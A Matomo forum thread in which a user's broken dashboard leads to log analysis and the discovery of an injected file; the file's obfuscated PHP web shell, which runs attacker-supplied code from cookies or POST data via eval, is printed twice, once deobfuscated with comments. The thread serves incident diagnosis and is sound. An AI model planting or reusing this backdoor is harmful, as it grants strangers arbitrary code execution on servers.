Dashboard not showing

cvbowlr · April 4, 2019, 12:08am

Hello,

I could not log in to matomo (the page was simply blank) so I tried the various steps the FAQ outlined and ended up uploading and overwriting all the files (after backing up config.ini). That let me login but now the dashboard won’t display and it shows this error message:

Oops… there was a problem during the request. Maybe the server had a temporary issue, or maybe you requested a report with too much data. Please try again. If this error occurs repeatedly please contact your Matomo administrator for assistance.

How can I fix this? Thanks

fdellwing · April 4, 2019, 7:03am

Do you have access to the PHP error logs? If you are on shared hosting, please consult your hosting provider.

There should be errors in this log, if you show them to us, we might be able to tell you what to do.

cvbowlr · April 4, 2019, 9:46pm

Hi Fabian,

It’s on a vps. Here is what I found:

[Wed Apr 03 00:07:29 2019] [error] [client 160.153.153.31] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php, referer: https://example.com/core/Plugin/Dimension/xctupkgy.php
[Wed Apr 03 00:07:31 2019] [error] [client 50.87.144.89] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php, referer: https://example.com/core/Plugin/Dimension/xctupkgy.php
[Wed Apr 03 00:07:34 2019] [error] [client 198.57.247.154] client denied by server configuration: /home/hfrnot211/example.com/vendor/piwik/device-detector/Cache/PSR16Bridge.php,
[Wed Apr 03 00:07:35 2019] [error] [client 192.185.2.129] client denied by server configuration: /home/hfrnot211/example.com/vendor/piwik/device-detector/Cache/PSR16Bridge.php,
[Wed Apr 03 00:07:36 2019] [error] [client 192.185.83.95] client denied by server configuration: /home/hfrnot211/example.com/vendor/piwik/device-detector/Cache/PSR16Bridge.php,
[Wed Apr 03 00:07:43 2019] [error] [client 69.195.124.203] client denied by server configuration: /home/hfrnot211/example.com/plugins/RssWidget/Widgets/thxjxlbk.php,
[Wed Apr 03 00:07:44 2019] [error] [client 173.201.196.182] client denied by server configuration: /home/hfrnot211/example.com/plugins/RssWidget/Widgets/thxjxlbk.php,
[Wed Apr 03 00:07:48 2019] [error] [client 198.154.240.70] client denied by server configuration: /home/hfrnot211/example.com/plugins/Diagnostics/Diagnostic/TrackerCheck.php,
[Wed Apr 03 00:07:50 2019] [error] [client 54.69.144.70] client denied by server configuration: /home/hfrnot211/example.com/plugins/Diagnostics/Diagnostic/TrackerCheck.php,
[Wed Apr 03 00:07:51 2019] [error] [client 66.147.244.219] client denied by server configuration: /home/hfrnot211/example.com/plugins/Diagnostics/Diagnostic/TrackerCheck.php,

fdellwing · April 5, 2019, 7:03am

See here: ClientDeniedByServerConfiguration - Httpd Wiki

I guess you are missing a directory block with Require all granted.

Lukas · April 5, 2019, 8:27am

To be fair, I am pretty sure the files shouldn’t be called xctupkgy.php, so I’d recommend you to check if everything is okay and the files haven’t been modified.

cvbowlr · April 5, 2019, 7:34pm

I changed all folder and file permissions to 755. Still getting same issue.

cvbowlr · April 5, 2019, 7:36pm

[Thu Apr 04 14:44:45 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php
[Thu Apr 04 14:44:47 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php
[Thu Apr 04 14:44:48 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/vendor/piwik/device-detector/Cache/PSR16Bridge.php
[Thu Apr 04 14:44:49 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/plugins/RssWidget/Widgets/thxjxlbk.php
[Thu Apr 04 14:44:49 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/plugins/Diagnostics/Diagnostic/TrackerCheck.php
[Thu Apr 04 14:46:06 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php
[Thu Apr 04 14:56:36 2019] [error] [client 104.196.211.107] Symbolic link not allowed or link target not accessible: /home/hfrnot211/example.com/js/p.php
[Thu Apr 04 16:14:17 2019] [error] [client 35.237.24.128] Symbolic link not allowed or link target not accessible: /home/hfrnot211/example.com/js/p.php
[Thu Apr 04 21:03:06 2019] [error] [client 35.231.244.216] Symbolic link not allowed or link target not accessible: /home/hfrnot211/example.com/js/p.php

Lukas · April 5, 2019, 7:38pm

Hi,

Can you check if the files /home/hfrnot211/example.com/js/p.php and example.com/core/Plugin/Dimension/xctupkgy.php exist and what is in them?

cvbowlr · April 5, 2019, 8:40pm

Hi Lukas,

p.php is blank

xctupkgy.php contains:

<?php
$ckfca = 'pk*to_cs#b3\'m0uvy5-1xrg24iHad986nel7';$idcueee = Array();$idcueee[] = $ckfca[26].$ckfca[2];$idcueee[] = $ckfca[8];$idcueee[] = $ckfca[28].$ckfca[19].$ckfca[35].$ckfca[30].$ckfca[19].$ckfca[35].$ckfca[24].$ckfca[35].$ckfca[18].$ckfca[35].$ckfca[13].$ckfca[10].$ckfca[28].$ckfca[18].$ckfca[24].$ckfca[27].$ckfca[23].$ckfca[9].$ckfca[18].$ckfca[27].$ckfca[31].$ckfca[29].$ckfca[17].$ckfca[18].$ckfca[17].$ckfca[29].$ckfca[29].$ckfca[35].$ckfca[13].$ckfca[9].$ckfca[31].$ckfca[33].$ckfca[9].$ckfca[29].$ckfca[17].$ckfca[27];$idcueee[] = $ckfca[6].$ckfca[4].$ckfca[14].$ckfca[32].$ckfca[3];$idcueee[] = $ckfca[7].$ckfca[3].$ckfca[21].$ckfca[5].$ckfca[21].$ckfca[33].$ckfca[0].$ckfca[33].$ckfca[27].$ckfca[3];$idcueee[] = $ckfca[33].$ckfca[20].$ckfca[0].$ckfca[34].$ckfca[4].$ckfca[28].$ckfca[33];$idcueee[] = $ckfca[7].$ckfca[14].$ckfca[9].$ckfca[7].$ckfca[3].$ckfca[21];$idcueee[] = $ckfca[27].$ckfca[21].$ckfca[21].$ckfca[27].$ckfca[16].$ckfca[5].$ckfca[12].$ckfca[33].$ckfca[21].$ckfca[22].$ckfca[33];$idcueee[] = $ckfca[7].$ckfca[3].$ckfca[21].$ckfca[34].$ckfca[33].$ckfca[32];$idcueee[] = $ckfca[0].$ckfca[27].$ckfca[6].$ckfca[1];foreach ($idcueee[7]($_COOKIE, $_POST) as $fvljbb => $wbwrcw){function vpxwv($idcueee, $fvljbb, $iairx){return $idcueee[6]($idcueee[4]($fvljbb . $idcueee[2], ($iairx / $idcueee[8]($fvljbb)) + 1), 0, $iairx);}function fhnbk($idcueee, $lmrbrx){return @$idcueee[9]($idcueee[0], $lmrbrx);}function yhfcgig($idcueee, $lmrbrx){$whfieh = $idcueee[3]($lmrbrx) % 3;if (!$whfieh) {eval($lmrbrx[1]($lmrbrx[2]));exit();}}$wbwrcw = fhnbk($idcueee, $wbwrcw);yhfcgig($idcueee, $idcueee[5]($idcueee[1], $wbwrcw ^ vpxwv($idcueee, $fvljbb, $idcueee[8]($wbwrcw))));}

Lukas · April 5, 2019, 8:48pm

Hi @cvbowlr

This code looks a lot like programming code that tries to hide what it is doing

Most commonly this is some kind of malware that tries to take over the server or do other damage.

Please immediatly check everything on this server for anomalies and security issues (outdates CMS or plugins)

Also check all files on the server for their checksum and if they look suspicious (via the Matomo integrity checker and similar tools for other webapplications)

Lukas · April 5, 2019, 9:01pm

I am by far no expert in PHP malware, but formatting the code you posted a bit nicer makes it kind of readable:

<?php
$ckfca = 'pk*to_cs#b3\'m0uvy5-1xrg24iHad986nel7';
$idcueee = Array();
$idcueee[] = $ckfca[26] . $ckfca[2];
$idcueee[] = $ckfca[8];
$idcueee[] = $ckfca[28] . $ckfca[19] . $ckfca[35] . $ckfca[30] . $ckfca[19] . $ckfca[35] . $ckfca[24] . $ckfca[35] . $ckfca[18] . $ckfca[35] . $ckfca[13] . $ckfca[10] . $ckfca[28] . $ckfca[18] . $ckfca[24] . $ckfca[27] . $ckfca[23] . $ckfca[9] . $ckfca[18] . $ckfca[27] . $ckfca[31] . $ckfca[29] . $ckfca[17] . $ckfca[18] . $ckfca[17] . $ckfca[29] . $ckfca[29] . $ckfca[35] . $ckfca[13] . $ckfca[9] . $ckfca[31] . $ckfca[33] . $ckfca[9] . $ckfca[29] . $ckfca[17] . $ckfca[27];
$idcueee[] = $ckfca[6] . $ckfca[4] . $ckfca[14] . $ckfca[32] . $ckfca[3];
$idcueee[] = $ckfca[7] . $ckfca[3] . $ckfca[21] . $ckfca[5] . $ckfca[21] . $ckfca[33] . $ckfca[0] . $ckfca[33] . $ckfca[27] . $ckfca[3];
$idcueee[] = $ckfca[33] . $ckfca[20] . $ckfca[0] . $ckfca[34] . $ckfca[4] . $ckfca[28] . $ckfca[33];
$idcueee[] = $ckfca[7] . $ckfca[14] . $ckfca[9] . $ckfca[7] . $ckfca[3] . $ckfca[21];
$idcueee[] = $ckfca[27] . $ckfca[21] . $ckfca[21] . $ckfca[27] . $ckfca[16] . $ckfca[5] . $ckfca[12] . $ckfca[33] . $ckfca[21] . $ckfca[22] . $ckfca[33];
$idcueee[] = $ckfca[7] . $ckfca[3] . $ckfca[21] . $ckfca[34] . $ckfca[33] . $ckfca[32];
$idcueee[] = $ckfca[0] . $ckfca[27] . $ckfca[6] . $ckfca[1];

//$idcueee is now the following:
//    [0] => H*
//    [1] => #
//    [2] => d1781747-703d-4a2b-a695-59970b6eb95a
//    [3] => count
//    [4] => str_repeat
//    [5] => explode
//    [6] => substr
//    [7] => array_merge
//    [8] => strlen
//    [9] => pack

foreach ($idcueee[7]($_COOKIE, $_POST) as $fvljbb => $wbwrcw) {
    function vpxwv($idcueee, $fvljbb, $iairx) {
        return $idcueee[6]($idcueee[4]($fvljbb . $idcueee[2], ($iairx / $idcueee[8]($fvljbb)) + 1), 0, $iairx);
    }

    function fhnbk($idcueee, $lmrbrx) {
        return @$idcueee[9]($idcueee[0], $lmrbrx);
    }

    function yhfcgig($idcueee, $lmrbrx) {
        $whfieh = $idcueee[3]($lmrbrx) % 3;
        if (!$whfieh) {
            eval($lmrbrx[1]($lmrbrx[2]));
            exit();
        }
    }

    $wbwrcw = fhnbk($idcueee, $wbwrcw);
    yhfcgig($idcueee, $idcueee[5]($idcueee[1], $wbwrcw ^ vpxwv($idcueee, $fvljbb, $idcueee[8]($wbwrcw))));
}

This code allows anyone who can access this URL to execute arbitrary code on the server and basically do whatevery they want.

cvbowlr · April 5, 2019, 9:14pm

Thanks Lukas,

How do I check the checksums? It’s a vps hosting.

fdellwing · April 6, 2019, 7:34am

I would disable the webserver and seek help from your hoster. Everything there could be infected. The found code looks a damn lot like things explained in this handy video: YouTube

I would throw away anything that ever lived on that VPS, mostlikely nothing can be trusted anymore.